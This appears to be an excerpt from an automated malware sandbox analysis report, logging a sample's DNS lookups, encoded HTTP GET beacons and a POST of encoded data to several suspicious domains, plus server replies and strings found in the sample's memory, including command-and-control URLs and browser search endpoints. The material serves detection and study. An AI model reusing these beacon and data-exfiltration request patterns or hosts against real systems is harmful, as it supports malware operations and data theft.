    GET /2mep/?WLtH=Qs7dTkG74ZlbzDPIks80sLprU65g+bEtyeoxhvOotfrZ9WhcV54Y9rQsYH5lTs77muDKHbL5HIFuHfk3BCfdn4oV88xJK42NkH/MJMBzZ1962N0iLw==&W0-=CzJDBfQxOTFPL HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.5
    Host: www.127358.win
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
Source: global traffic, HTTP traffic detected:
    GET /cnve/?WLtH=2VDSQdlG5RaW3hcOSzrtXrxDd4bhZ8b1rLrGGnoiqQrQ5oU7TABHb8GSGDxsLG7YK+gXk2baIuNiiMBLfcdVbx8sa0WS/cLCNqs3fCZ4mL4UPzN89Q==&W0-=CzJDBfQxOTFPL HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.5
    Host: www.infohive.website
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
Source: global traffic, HTTP traffic detected:
    GET /ead0/?WLtH=OwnSiQTonAdwVTeqlw0c+DdVJwXlJPsoxE88ohWtB+WUIw034wY61NPL5vanrW433FkI4Wm16OMLJLHvwknBhs+/iOoUSS+snV9WWhaA8IUFph6/7A==&W0-=CzJDBfQxOTFPL HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.5
    Host: www.sunnyz.store
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
Source: global traffic, HTTP traffic detected:
    GET /dc08/?WLtH=K4m3PKR19259jK4EK1P0lrWLqd0y31/RgB+Ra8HyZbA6ylGAas28Oq8W0qL+J5Tllh3R0W9eHcyUnmETvv/z0+LVyr2ClayYlRRqEL4rpFPwSbvhCg==&W0-=CzJDBfQxOTFPL HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.5
    Host: www.muasamgiare.click
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
Source: global traffic, HTTP traffic detected:
    GET /wvsm/?W0-=CzJDBfQxOTFPL&WLtH=H1pfVel2drlcYDh6ppeQKLdaO9DOhj6yIL88m4llHuZ84xsjifxTPgBHlBYfPRS4eY+v71s/bZzgmcWb/gq2rG+uhWVx8heXLgKcp/EaPre6bkVIFA== HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.5
    Host: www.sfantulandrei.info
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
Source: global traffic, HTTP traffic detected:
    GET /0pqe/?WLtH=aJYCdvvPx+uKS5Ogd0A7vBDK6OZ68qCTbFX0p5fCFhilae8HyBK0z8Ue4klxYsqgBES9oGplOKNa3q3+NTywXADjEmAOq6f7maBI/5zBJpNE8z7ORg==&W0-=CzJDBfQxOTFPL HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.5
    Host: www.mffnow.info
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
Source: global traffic, DNS traffic detected: DNS query: www.qqa79.top
Source: global traffic, DNS traffic detected: DNS query: www.gk88top.top
Source: global traffic, DNS traffic detected: DNS query: www.127358.win
Source: global traffic, DNS traffic detected: DNS query: www.infohive.website
Source: global traffic, DNS traffic detected: DNS query: www.sunnyz.store
Source: global traffic, DNS traffic detected: DNS query: www.muasamgiare.click
Source: global traffic, DNS traffic detected: DNS query: www.sfantulandrei.info
Source: global traffic, DNS traffic detected: DNS query: www.mffnow.info
Source: unknown, HTTP traffic detected:
    POST /vjnn/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.5
    Host: www.gk88top.top
    Content-Type: application/x-www-form-urlencoded
    Connection: close
    Content-Length: 193
    Cache-Control: no-cache
    Origin: http://www.gk88top.top
    Referer: http://www.gk88top.top/vjnn/
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
    Data Ascii: WLtH=y/nbf6lCzqeuPysmEJy86ffNMABc7U2Y99v9br8RWFDR/ZZ9OBNoxvdWw4os3r7Oxy5acUB9wcG/AsK2D98v3Vh9+BRRmsPKFhUVzbm0AYKrw9Ob1Jx4v+NQV6BOVmu6UbAgTNoQLpcX7w6Dpk9CpKgqItS5gLPeubZ8BCJHMfzjxpZCJRHvlifF1OuO
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 02:32:05 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:32:21 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7IAews4r%2BdV1W5zco7n%2BwOoWPqvUS27R9vQDvypA0Njm%2BYEyeAZ5GRXi61ICjcmeFS6e8V5auBVtWPy5LYDD%2FTaoHVdw8srkjYIy55pcNZrTXJyAKNLda%2FEFXcTsowfXTLg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90017eec8f467c78-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1973&min_rtt=1973&rtt_var=986&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=836&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:32:24 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wfufDZJLHbRNzoItasHbDw9Jz%2FsLEB7Lx98G1uiohN2AQvOx4wyEC15skc%2Fl2ZgwE27zKnjwAFJ%2FBzIH798R85lsLs%2FVRVrc6MX1LQZtu%2FvevMYJZZZtqwVkxZXLUhHgue8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90017efc69fc1831-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1677&min_rtt=1677&rtt_var=838&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=860&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:32:26 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oElepLcww0bT6vSsBAYuZmSBfA6vcTe67EQuvQQ7Rt40GJHsMKw5E9Kw4uEm5S%2FIixodfDMaPy2wWK0WTV5C8Kiu96aNsxsB25OpXhQHv0P1Zi2n4tBCTd42Y7K0WZNlxjY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90017f0c993042ac-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1766&min_rtt=1766&rtt_var=883&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1873&delivery_rate=0&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:32:29 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RWJ7RYcwmQkKmK8PW0xudB3EKyR77NkIT5YfdVVVtmgDj8SvW1PXGgdyY4RdIjpirHvpkfZW5mmI%2FHtIwQJidUWKxK3%2BQBOuIsxei3Brb5GSEAkyLUjKSN74EWeMSRXhyHM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90017f1cad897cae-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1878&min_rtt=1878&rtt_var=939&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=580&delivery_rate=0&cwnd=193&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:33:12 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:33:14 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:33:17 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: OGbZSCDMTTWQqW.exe, 00000008.00000002.3155508857.0000000004C06000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mffnow.info
                Source: OGbZSCDMTTWQqW.exe, 00000008.00000002.3155508857.0000000004C06000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mffnow.info/0pqe/
                Source: comp.exe, 00000007.00000002.3156875239.000000000786E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: comp.exe, 00000007.00000002.3156875239.000000000786E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: comp.exe, 00000007.00000002.3156875239.000000000786E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: comp.exe, 00000007.00000002.3156875239.000000000786E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
